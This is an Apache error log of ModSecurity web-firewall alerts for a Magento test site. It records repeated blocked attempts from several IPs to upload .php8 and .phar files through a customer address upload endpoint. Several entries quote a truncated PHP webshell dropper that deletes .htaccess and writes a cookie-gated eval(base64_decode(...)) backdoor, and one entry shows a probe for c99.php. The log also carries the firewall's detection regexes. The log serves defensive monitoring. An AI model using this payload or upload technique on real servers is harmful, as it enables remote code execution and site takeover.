[Sat Feb 07 03:31:17.353802 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: qy88364f428d25.php8 found within FILES:custom_attributes[country_id]: qy88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYaj9dNid4fXT6wPf1RccAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/y/qy88364f428d25.phar
[Sat Feb 07 03:31:17.354478 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYaj9dNid4fXT6wPf1RccAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/y/qy88364f428d25.phar
[Sat Feb 07 03:31:17.354658 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYaj9dNid4fXT6wPf1RccAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/y/qy88364f428d25.phar
[Sat Feb 07 03:31:17.764167 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Rule 7f099c9c1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.php8"] [unique_id "aYaj9dNid4fXT6wPf1RccQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.764610 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.php8"] [unique_id "aYaj9dNid4fXT6wPf1RccQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.767019 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.php8"] [unique_id "aYaj9dNid4fXT6wPf1RccQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.767193 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.php8"] [unique_id "aYaj9dNid4fXT6wPf1RccQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:23.696744 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Rule 7fd013902be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.phar"] [unique_id "aYgrJ4hRc5R32lty2nIHhwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:23.697224 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.phar"] [unique_id "aYgrJ4hRc5R32lty2nIHhwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:23.699650 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.phar"] [unique_id "aYgrJ4hRc5R32lty2nIHhwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:23.699843 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.phar"] [unique_id "aYgrJ4hRc5R32lty2nIHhwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:24.040536 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: kv88364f428d25.php8 found within FILES:custom_attributes[country_id]: kv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYgrKIhRc5R32lty2nIHiAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/v/kv88364f428d25.phar
[Sun Feb 08 07:20:24.041193 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYgrKIhRc5R32lty2nIHiAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/v/kv88364f428d25.phar
[Sun Feb 08 07:20:24.041398 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYgrKIhRc5R32lty2nIHiAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/v/kv88364f428d25.phar
[Sun Feb 08 07:20:24.354004 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Rule 7fd013902be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.php8"] [unique_id "aYgrKIhRc5R32lty2nIHiQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:24.354715 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.php8"] [unique_id "aYgrKIhRc5R32lty2nIHiQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:24.357945 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.php8"] [unique_id "aYgrKIhRc5R32lty2nIHiQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 07:20:24.358191 2026] [:error] [pid 1943816] [client 213.109.225.211:25464] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/v/kv88364f428d25.php8"] [unique_id "aYgrKIhRc5R32lty2nIHiQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 08 08:20:47.298041 2026] [php:error] [pid 1943837] [client 4.194.107.19:42983] script '/var/www/magento.test.indacotrentino.com/www/pub/images/c99.php' not found or unable to stat
[Mon Feb 09 10:58:13.082628 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Rule 7faf0ab44be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.phar"] [unique_id "aYmvtYrczv-fll22cvFP6QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:13.083173 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.phar"] [unique_id "aYmvtYrczv-fll22cvFP6QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:13.085817 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.phar"] [unique_id "aYmvtYrczv-fll22cvFP6QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:13.086005 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.phar"] [unique_id "aYmvtYrczv-fll22cvFP6QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:13.309204 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 4g88364f428d25.php8 found within FILES:custom_attributes[country_id]: 4g88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYmvtYrczv-fll22cvFP6gAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/g/4g88364f428d25.phar
[Mon Feb 09 10:58:13.309898 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYmvtYrczv-fll22cvFP6gAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/g/4g88364f428d25.phar
[Mon Feb 09 10:58:13.310083 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYmvtYrczv-fll22cvFP6gAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/4/g/4g88364f428d25.phar
[Mon Feb 09 10:58:14.103153 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Rule 7faf0ab44be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.php8"] [unique_id "aYmvtorczv-fll22cvFP6wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:14.103626 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.php8"] [unique_id "aYmvtorczv-fll22cvFP6wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:14.106074 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.php8"] [unique_id "aYmvtorczv-fll22cvFP6wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 09 10:58:14.106246 2026] [:error] [pid 1964060] [client 185.65.202.110:43504] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/4/g/4g88364f428d25.php8"] [unique_id "aYmvtorczv-fll22cvFP6wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:34.495542 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Rule 7ffb7a009be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.phar"] [unique_id "aYq9FlF_SARmWfWvHOQXjQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 10 06:07:34.496079 2026] [:error] [pid 1988157] [client 46.149.66.101:45120] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/g/5g88364f428d25.phar"] [unique_id "aYq9FlF_SARmWfWvHOQXjQAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
